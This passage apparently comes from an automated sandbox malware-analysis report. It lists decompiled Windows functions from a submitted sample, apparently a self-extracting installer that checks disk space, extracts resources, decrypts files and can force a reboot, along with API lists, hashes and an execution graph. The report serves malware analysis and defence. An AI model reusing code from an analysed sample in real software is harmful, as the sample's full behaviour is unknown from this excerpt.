                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: debf96b020eb8414283f2034e0ddc984f56e85c04d871b0cb1293f6dd7af280f
                                                                                                                                                                                                        • Instruction ID: 2ae549f5b2d2744889db4b6338881457e35d53200ea81f517e234d6e1525a4b5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: debf96b020eb8414283f2034e0ddc984f56e85c04d871b0cb1293f6dd7af280f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D50184729012147BDB309AAB9C4CEEB767CEB85F10F14012ABA0DF2280E561C644D761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E00E865E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x00e865e8
                                                                                                                                                                                                        0x00e865ed
                                                                                                                                                                                                        0x00e865ef
                                                                                                                                                                                                        0x00e865f2
                                                                                                                                                                                                        0x00e865f4
                                                                                                                                                                                                        0x00e865f4
                                                                                                                                                                                                        0x00e865f6
                                                                                                                                                                                                        0x00e865f7
                                                                                                                                                                                                        0x00e86608
                                                                                                                                                                                                        0x00e86611
                                                                                                                                                                                                        0x00e86618
                                                                                                                                                                                                        0x00e8661c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8660e
                                                                                                                                                                                                        0x00e86623
                                                                                                                                                                                                        0x00e86625
                                                                                                                                                                                                        0x00e8663b
                                                                                                                                                                                                        0x00e8663b
                                                                                                                                                                                                        0x00e8663d
                                                                                                                                                                                                        0x00e86641
                                                                                                                                                                                                        0x00e86610
                                                                                                                                                                                                        0x00e86610
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e86610
                                                                                                                                                                                                        0x00e86644
                                                                                                                                                                                                        0x00e86647
                                                                                                                                                                                                        0x00e86647
                                                                                                                                                                                                        0x00e86621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00E82B33), ref: 00E86602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00E86612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00E86629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00E86635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: 109af337d46429caabd4e01fe7af5c960ab82490a7d6e6aa57223f0c2ecb2837
                                                                                                                                                                                                        • Instruction ID: c24668e6eec0580a338deca16f1334456e1a8777b1dc6237bd256601c1ab140e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 109af337d46429caabd4e01fe7af5c960ab82490a7d6e6aa57223f0c2ecb2837
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62F0F9710055906EE7322B298CCC8B7AF9CCF87258B1D01BFE49DB2011E6150D069761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E869B0() {
                                                                                                                                                                                                        				intOrPtr* _t4;
                                                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				 *0xe881f8 = E00E86C70();
                                                                                                                                                                                                        				__set_app_type(E00E86FBE(2));
                                                                                                                                                                                                        				 *0xe888a4 =  *0xe888a4 | 0xffffffff;
                                                                                                                                                                                                        				 *0xe888a8 =  *0xe888a8 | 0xffffffff;
                                                                                                                                                                                                        				_t4 = __p__fmode();
                                                                                                                                                                                                        				_t11 =  *0xe88528; // 0x0
                                                                                                                                                                                                        				 *_t4 = _t11;
                                                                                                                                                                                                        				_t5 = __p__commode();
                                                                                                                                                                                                        				_t12 =  *0xe8851c; // 0x0
                                                                                                                                                                                                        				 *_t5 = _t12;
                                                                                                                                                                                                        				_t6 = E00E87000();
                                                                                                                                                                                                        				if( *0xe88000 == 0) {
                                                                                                                                                                                                        					__setusermatherr(E00E87000);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E871EF(_t6);
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00e869b7
                                                                                                                                                                                                        0x00e869c2
                                                                                                                                                                                                        0x00e869c8
                                                                                                                                                                                                        0x00e869cf
                                                                                                                                                                                                        0x00e869d8
                                                                                                                                                                                                        0x00e869de
                                                                                                                                                                                                        0x00e869e4
                                                                                                                                                                                                        0x00e869e6
                                                                                                                                                                                                        0x00e869ec
                                                                                                                                                                                                        0x00e869f2
                                                                                                                                                                                                        0x00e869f4
                                                                                                                                                                                                        0x00e86a00
                                                                                                                                                                                                        0x00e86a07
                                                                                                                                                                                                        0x00e86a0d
                                                                                                                                                                                                        0x00e86a0e
                                                                                                                                                                                                        0x00e86a15

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00E86FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 00E869C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 00E869D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 00E869E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00E86A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: b037a2e2fadc47d2feb3a4e2a73228d687515a381be2bc99d3d1c40c825504e7
                                                                                                                                                                                                        • Instruction ID: 581e1256ed969b12592799f499262a8a61359e381ebe963994976aad4f45292b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b037a2e2fadc47d2feb3a4e2a73228d687515a381be2bc99d3d1c40c825504e7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16F09E74549301CFD7687B75BE0E6143BA1F704331B641619E86DB62F1CF3A85498B15
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E86952(CHAR* __ecx) {
                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                                        				if( *__ecx != 0) {
                                                                                                                                                                                                        					_t6 =  &_v20; // 0xe85760
                                                                                                                                                                                                        					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                                                                                                                                                        						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t22;
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00e8695b
                                                                                                                                                                                                        0x00e86960
                                                                                                                                                                                                        0x00e86963
                                                                                                                                                                                                        0x00e86966
                                                                                                                                                                                                        0x00e86969
                                                                                                                                                                                                        0x00e8696c
                                                                                                                                                                                                        0x00e86972
                                                                                                                                                                                                        0x00e86987
                                                                                                                                                                                                        0x00e8699f
                                                                                                                                                                                                        0x00e8699f
                                                                                                                                                                                                        0x00e86987
                                                                                                                                                                                                        0x00e869a7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00E85760,?,A:\), ref: 00E8697F
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00E86999
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                                                                                        • String ID: `W
                                                                                                                                                                                                        • API String ID: 1705453755-2113494416
                                                                                                                                                                                                        • Opcode ID: b259fd290a231c83e5843281da796c6f1859c54e64afbfdc1536c270fd0fdbbc
                                                                                                                                                                                                        • Instruction ID: bcc95a30d880ecff902cefa345080b0c4e6da8977f58f19b0fa85a9aaccbcb04
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b259fd290a231c83e5843281da796c6f1859c54e64afbfdc1536c270fd0fdbbc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34F0E7B6D01228BBDB11DFE98844ADEBBBCEB48701F144196E614F2240D6719A048B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.8%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:955
                                                                                                                                                                                                        Total number of Limit Nodes:25
                                                                                                                                                                                                        execution_graph 2190 c6f40 SetUnhandledExceptionFilter 2191 c4cc0 GlobalFree 3113 c4200 3114 c421e 3113->3114 3115 c420b SendMessageA 3113->3115 3115->3114 3116 c3100 3117 c31b0 3116->3117 3118 c3111 3116->3118 3119 c31b9 SendDlgItemMessageA 3117->3119 3122 c3141 3117->3122 3120 c311d 3118->3120 3123 c3149 GetDesktopWindow 3118->3123 3119->3122 3121 c3138 EndDialog 3120->3121 3120->3122 3121->3122 3126 c43d0 6 API calls 3123->3126 3127 c4463 SetWindowPos 3126->3127 3129 c6ce0 4 API calls 3127->3129 3130 c315d 6 API calls 3129->3130 3130->3122 3131 c4bc0 3133 c4c05 3131->3133 3134 c4bd7 3131->3134 3132 c4c1b SetFilePointer 3132->3134 3133->3132 3133->3134 3135 c30c0 3136 c30de CallWindowProcA 3135->3136 3137 c30ce 3135->3137 3138 c30da 3136->3138 3137->3136 3137->3138 3139 c6c03 3140 c6c1e 3139->3140 3141 c6c17 _exit 3139->3141 3142 c6c27 _cexit 3140->3142 3143 c6c32 3140->3143 3141->3140 3142->3143 2192 c4ad0 2200 c3680 2192->2200 2195 c4aee WriteFile 2197 c4b0f 2195->2197 2198 c4b14 2195->2198 2196 c4ae9 2198->2197 2199 c4b3b SendDlgItemMessageA 2198->2199 2199->2197 2201 c3691 MsgWaitForMultipleObjects 2200->2201 2202 c36e8 2201->2202 2203 c36a9 PeekMessageA 2201->2203 2202->2195 2202->2196 2203->2201 2204 c36bc 2203->2204 2204->2201 2204->2202 2205 c36c7 DispatchMessageA 2204->2205 2206 c36d1 PeekMessageA 2204->2206 2205->2206 2206->2204 2207 c4cd0 2208 c4d0b 2207->2208 2209 c4cf4 2207->2209 2210 c4d02 2208->2210 2213 c4dcb 2208->2213 2216 c4d25 2208->2216 2209->2210 2211 c4b60 FindCloseChangeNotification 2209->2211 2264 c6ce0 2210->2264 2211->2210 2215 c4dd4 SetDlgItemTextA 2213->2215 2217 c4de3 2213->2217 2214 c4e95 2215->2217 2216->2210 2230 c4c37 2216->2230 2217->2210 2238 c476d 2217->2238 2221 c4e38 2221->2210 2247 c4980 2221->2247 2226 c4e64 2255 c47e0 LocalAlloc 2226->2255 2229 c4e6f 2229->2210 2231 c4c4c DosDateTimeToFileTime 2230->2231 2232 c4c88 2230->2232 2231->2232 2233 c4c5e LocalFileTimeToFileTime 2231->2233 2232->2210 2235 c4b60 2232->2235 2233->2232 2234 c4c70 SetFileTime 2233->2234 2234->2232 2236 c4b76 SetFileAttributesA 2235->2236 2237 c4b92 FindCloseChangeNotification 2235->2237 2236->2210 2237->2236 2269 c66ae GetFileAttributesA 2238->2269 2240 c477b 2240->2221 2241 c47cc SetFileAttributesA 2243 c47db 2241->2243 2243->2221 2246 c47c2 2246->2241 2248 c4990 2247->2248 2249 c49a5 2248->2249 2250 c49c2 lstrcmpA 2248->2250 2251 c44b9 20 API calls 2249->2251 2252 c4a0e 2250->2252 2253 c49ba 2250->2253 2251->2253 2252->2253 2335 c487a 2252->2335 2253->2210 2253->2226 2256 c480f LocalAlloc 2255->2256 2257 c47f6 2255->2257 2260 c4831 2256->2260 2263 c480b 2256->2263 2258 c44b9 20 API calls 2257->2258 2258->2263 2261 c44b9 20 API calls 2260->2261 2262 c4846 LocalFree 2261->2262 2262->2263 2263->2229 2265 c6ce8 2264->2265 2266 c6ceb 2264->2266 2265->2214 2348 c6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2266->2348 2268 c6e26 2268->2214 2270 c4777 2269->2270 2270->2240 2270->2241 2271 c6517 FindResourceA 2270->2271 2272 c656b 2271->2272 2273 c6536 LoadResource 2271->2273 2278 c44b9 2272->2278 2273->2272 2275 c6544 DialogBoxIndirectParamA FreeResource 2273->2275 2275->2272 2276 c47b1 2275->2276 2276->2241 2276->2243 2276->2246 2279 c44fe LoadStringA 2278->2279 2280 c455a 2278->2280 2281 c4527 2279->2281 2282 c4562 2279->2282 2284 c6ce0 4 API calls 2280->2284 2283 c681f 10 API calls 2281->2283 2287 c457e LocalAlloc 2282->2287 2288 c45c9 2282->2288 2285 c452c 2283->2285 2286 c4689 2284->2286 2292 c4536 MessageBoxA 2285->2292 2319 c67c9 2285->2319 2286->2276 2287->2280 2300 c45af 2287->2300 2290 c4607 LocalAlloc 2288->2290 2293 c45cd 2288->2293 2290->2280 2294 c45c4 2290->2294 2292->2280 2293->2293 2295 c45d9 LocalAlloc 2293->2295 2296 c462d MessageBeep 2294->2296 2295->2280 2298 c45f3 2295->2298 2307 c681f 2296->2307 2301 c171e _vsnprintf 2298->2301 2325 c171e 2300->2325 2301->2294 2304 c4645 MessageBoxA LocalFree 2304->2280 2305 c67c9 EnumResourceLanguagesA 2305->2304 2308 c6857 GetVersionExA 2307->2308 2309 c6940 2307->2309 2311 c687c 2308->2311 2318 c691a 2308->2318 2310 c6ce0 4 API calls 2309->2310 2312 c463b 2310->2312 2313 c68a5 GetSystemMetrics 2311->2313 2311->2318 2312->2304 2312->2305 2314 c68b5 RegOpenKeyExA 2313->2314 2313->2318 2315 c68d6 RegQueryValueExA RegCloseKey 2314->2315 2314->2318 2316 c690c 2315->2316 2315->2318 2329 c66f9 2316->2329 2318->2309 2320 c67e2 2319->2320 2324 c6803 2319->2324 2333 c6793 EnumResourceLanguagesA 2320->2333 2322 c67f5 2322->2324 2334 c6793 EnumResourceLanguagesA 2322->2334 2324->2292 2326 c172d 2325->2326 2327 c173d _vsnprintf 2326->2327 2328 c175d 2326->2328 2327->2328 2328->2294 2330 c670f 2329->2330 2331 c6740 CharNextA 2330->2331 2332 c674b 2330->2332 2331->2330 2332->2318 2333->2322 2334->2324 2336 c48a2 CreateFileA 2335->2336 2338 c4908 2336->2338 2339 c48e9 2336->2339 2338->2253 2339->2338 2340 c48ee 2339->2340 2343 c490c 2340->2343 2344 c48f5 CreateFileA 2343->2344 2346 c4917 2343->2346 2344->2338 2345 c4962 CharNextA 2345->2346 2346->2344 2346->2345 2347 c4953 CreateDirectoryA 2346->2347 2347->2345 2348->2268 3144 c3210 3145 c328e EndDialog 3144->3145 3146 c3227 3144->3146 3162 c3239 3145->3162 3147 c3235 3146->3147 3148 c33e2 GetDesktopWindow 3146->3148 3152 c324c 3147->3152 3153 c32dd GetDlgItemTextA 3147->3153 3147->3162 3150 c43d0 11 API calls 3148->3150 3151 c33f1 SetWindowTextA SendDlgItemMessageA 3150->3151 3154 c341f GetDlgItem EnableWindow 3151->3154 3151->3162 3155 c32c5 EndDialog 3152->3155 3156 c3251 3152->3156 3163 c32fc 3153->3163 3176 c3366 3153->3176 3154->3162 3155->3162 3157 c325c LoadStringA 3156->3157 3156->3162 3159 c327b 3157->3159 3160 c3294 3157->3160 3158 c44b9 20 API calls 3158->3162 3166 c44b9 20 API calls 3159->3166 3182 c4224 LoadLibraryA 3160->3182 3165 c3331 GetFileAttributesA 3163->3165 3163->3176 3168 c337c 3165->3168 3169 c333f 3165->3169 3166->3145 3167 c32a5 SetDlgItemTextA 3167->3159 3167->3162 3170 c658a CharPrevA 3168->3170 3171 c44b9 20 API calls 3169->3171 3172 c338d 3170->3172 3173 c3351 3171->3173 3175 c58c8 27 API calls 3172->3175 3173->3162 3174 c335a CreateDirectoryA 3173->3174 3174->3168 3174->3176 3177 c3394 3175->3177 3176->3158 3177->3176 3178 c33a4 3177->3178 3179 c33c7 EndDialog 3178->3179 3180 c597d 34 API calls 3178->3180 3179->3162 3181 c33c3 3180->3181 3181->3162 3181->3179 3183 c4246 GetProcAddress 3182->3183 3184 c43b2 3182->3184 3185 c425d GetProcAddress 3183->3185 3186 c43a4 FreeLibrary 3183->3186 3188 c44b9 20 API calls 3184->3188 3185->3186 3187 c4274 GetProcAddress 3185->3187 3186->3184 3187->3186 3189 c428b 3187->3189 3190 c329d 3188->3190 3191 c4295 GetTempPathA 3189->3191 3196 c42e1 3189->3196 3190->3162 3190->3167 3192 c42ad 3191->3192 3192->3192 3193 c42b4 CharPrevA 3192->3193 3194 c42d0 CharPrevA 3193->3194 3193->3196 3194->3196 3195 c4390 FreeLibrary 3195->3190 3196->3195 3197 c4a50 3198 c4a9f ReadFile 3197->3198 3199 c4a66 3197->3199 3200 c4abb 3198->3200 3199->3200 3201 c4a82 memcpy 3199->3201 3201->3200 3202 c3450 3203 c345e 3202->3203 3204 c34d3 EndDialog 3202->3204 3205 c349a GetDesktopWindow 3203->3205 3210 c3465 3203->3210 3206 c346a 3204->3206 3207 c43d0 11 API calls 3205->3207 3208 c34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3207->3208 3208->3206 3209 c348c EndDialog 3209->3206 3210->3206 3210->3209 3211 c6bef _XcptFilter 3212 c6425 CreateFileA 3213 c6448 WriteFile 3212->3213 3214 c643a 3212->3214 3215 c6465 CloseHandle 3213->3215 3217 c6ce0 4 API calls 3214->3217 3215->3214 3218 c648f 3217->3218 2349 c4ca0 GlobalAlloc 2350 c6a60 2367 c7155 2350->2367 2352 c6a65 2353 c6a76 GetStartupInfoW 2352->2353 2354 c6a93 2353->2354 2355 c6aa8 2354->2355 2356 c6aaf Sleep 2354->2356 2357 c6ac7 _amsg_exit 2355->2357 2360 c6ad1 2355->2360 2356->2354 2357->2360 2358 c6b2e __IsNonwritableInCurrentImage 2362 c6bd6 _ismbblead 2358->2362 2363 c6c1e 2358->2363 2366 c6bbe exit 2358->2366 2372 c2bfb GetVersion 2358->2372 2359 c6b13 _initterm 2359->2358 2360->2358 2360->2359 2361 c6af4 2360->2361 2362->2358 2363->2361 2364 c6c27 _cexit 2363->2364 2364->2361 2366->2358 2368 c717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2367->2368 2369 c717a 2367->2369 2371 c71cd 2368->2371 2369->2368 2370 c71e2 2369->2370 2370->2352 2371->2370 2373 c2c0f 2372->2373 2374 c2c50 2372->2374 2373->2374 2375 c2c13 GetModuleHandleW 2373->2375 2389 c2caa memset memset memset 2374->2389 2375->2374 2378 c2c22 GetProcAddress 2375->2378 2378->2374 2380 c2c34 2378->2380 2379 c2c8e 2382 c2c9e 2379->2382 2383 c2c97 CloseHandle 2379->2383 2380->2374 2382->2358 2383->2382 2387 c2c89 2483 c1f90 2387->2483 2500 c468f FindResourceA SizeofResource 2389->2500 2392 c2ef3 2394 c44b9 20 API calls 2392->2394 2393 c2d2d CreateEventA SetEvent 2395 c468f 7 API calls 2393->2395 2396 c2d6e 2394->2396 2397 c2d57 2395->2397 2401 c6ce0 4 API calls 2396->2401 2398 c2d5b 2397->2398 2400 c2e1f 2397->2400 2403 c468f 7 API calls 2397->2403 2399 c44b9 20 API calls 2398->2399 2399->2396 2505 c5c9e 2400->2505 2404 c2c62 2401->2404 2406 c2d9f 2403->2406 2404->2379 2430 c2f1d 2404->2430 2406->2398 2409 c2da3 CreateMutexA 2406->2409 2407 c2e3a 2410 c2e52 FindResourceA 2407->2410 2411 c2e43 2407->2411 2408 c2e30 2408->2392 2409->2400 2412 c2dbd GetLastError 2409->2412 2415 c2e64 LoadResource 2410->2415 2419 c2e6e 2410->2419 2531 c2390 2411->2531 2412->2400 2414 c2dca 2412->2414 2417 c2dea 2414->2417 2418 c2dd5 2414->2418 2415->2419 2416 c2e4d 2416->2396 2421 c44b9 20 API calls 2417->2421 2420 c44b9 20 API calls 2418->2420 2419->2416 2546 c36ee GetVersionExA 2419->2546 2423 c2de8 2420->2423 2424 c2dff 2421->2424 2425 c2e04 CloseHandle 2423->2425 2424->2400 2424->2425 2425->2396 2429 c6517 24 API calls 2429->2416 2431 c2f6c 2430->2431 2432 c2f3f 2430->2432 2654 c5164 2431->2654 2433 c2f5f 2432->2433 2635 c51e5 2432->2635 2782 c3a3f 2433->2782 2437 c2f71 2440 c303c 2437->2440 2667 c55a0 2437->2667 2443 c6ce0 4 API calls 2440->2443 2445 c2c6b 2443->2445 2444 c2f86 GetSystemDirectoryA 2446 c658a CharPrevA 2444->2446 2470 c52b6 2445->2470 2447 c2fab LoadLibraryA 2446->2447 2448 c2ff7 FreeLibrary 2447->2448 2449 c2fc0 GetProcAddress 2447->2449 2451 c3006 2448->2451 2452 c3017 SetCurrentDirectoryA 2448->2452 2449->2448 2450 c2fd6 DecryptFileA 2449->2450 2450->2448 2460 c2ff0 2450->2460 2451->2452 2715 c621e GetWindowsDirectoryA 2451->2715 2453 c3054 2452->2453 2454 c3026 2452->2454 2457 c3061 2453->2457 2725 c3b26 2453->2725 2455 c44b9 20 API calls 2454->2455 2459 c3037 2455->2459 2457->2440 2462 c307a 2457->2462 2734 c256d 2457->2734 2801 c6285 GetLastError 2459->2801 2460->2448 2464 c3098 2462->2464 2745 c3ba2 2462->2745 2464->2440 2468 c30af 2464->2468 2803 c4169 2468->2803 2471 c52d6 2470->2471 2479 c5316 2470->2479 2472 c5300 LocalFree LocalFree 2471->2472 2474 c52eb SetFileAttributesA DeleteFileA 2471->2474 2472->2471 2472->2479 2473 c538c 2475 c6ce0 4 API calls 2473->2475 2474->2472 2477 c2c72 2475->2477 2477->2379 2477->2387 2478 c535e SetCurrentDirectoryA 2481 c2390 13 API calls 2478->2481 2479->2478 2480 c65e8 4 API calls 2479->2480 2482 c5374 2479->2482 2480->2478 2481->2482 2482->2473 3109 c1fe1 2482->3109 2484 c1f9a 2483->2484 2486 c1f9f 2483->2486 2485 c1ea7 15 API calls 2484->2485 2485->2486 2487 c1fc0 2486->2487 2488 c44b9 20 API calls 2486->2488 2492 c1fd9 2486->2492 2489 c1fcf ExitWindowsEx 2487->2489 2490 c1ee2 GetCurrentProcess OpenProcessToken 2487->2490 2487->2492 2488->2487 2489->2492 2493 c1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2490->2493 2495 c1f0e 2490->2495 2492->2379 2494 c1f6b ExitWindowsEx 2493->2494 2493->2495 2494->2495 2496 c1f1f 2494->2496 2497 c44b9 20 API calls 2495->2497 2498 c6ce0 4 API calls 2496->2498 2497->2496 2499 c1f8c 2498->2499 2499->2379 2501 c2d1a 2500->2501 2502 c46b6 2500->2502 2501->2392 2501->2393 2502->2501 2503 c46be FindResourceA LoadResource LockResource 2502->2503 2503->2501 2504 c46df memcpy_s FreeResource 2503->2504 2504->2501 2511 c5e17 2505->2511 2514 c5cc3 2505->2514 2506 c5dd0 2510 c5dec GetModuleFileNameA 2506->2510 2506->2511 2507 c6ce0 4 API calls 2509 c2e2c 2507->2509 2508 c5ced CharNextA 2508->2514 2509->2407 2509->2408 2510->2511 2512 c5e0a 2510->2512 2511->2507 2581 c66c8 2512->2581 2514->2506 2514->2508 2514->2511 2515 c6218 2514->2515 2518 c5e36 CharUpperA 2514->2518 2524 c5f9f CharUpperA 2514->2524 2525 c5f59 CompareStringA 2514->2525 2526 c6003 CharUpperA 2514->2526 2527 c667f IsDBCSLeadByte CharNextA 2514->2527 2528 c60a2 CharUpperA 2514->2528 2529 c5edc CharUpperA 2514->2529 2586 c658a 2514->2586 2590 c6e2a 2515->2590 2518->2514 2519 c61d0 2518->2519 2520 c44b9 20 API calls 2519->2520 2521 c61e7 2520->2521 2522 c61f7 ExitProcess 2521->2522 2523 c61f0 CloseHandle 2521->2523 2523->2522 2524->2514 2525->2514 2526->2514 2527->2514 2528->2514 2529->2514 2532 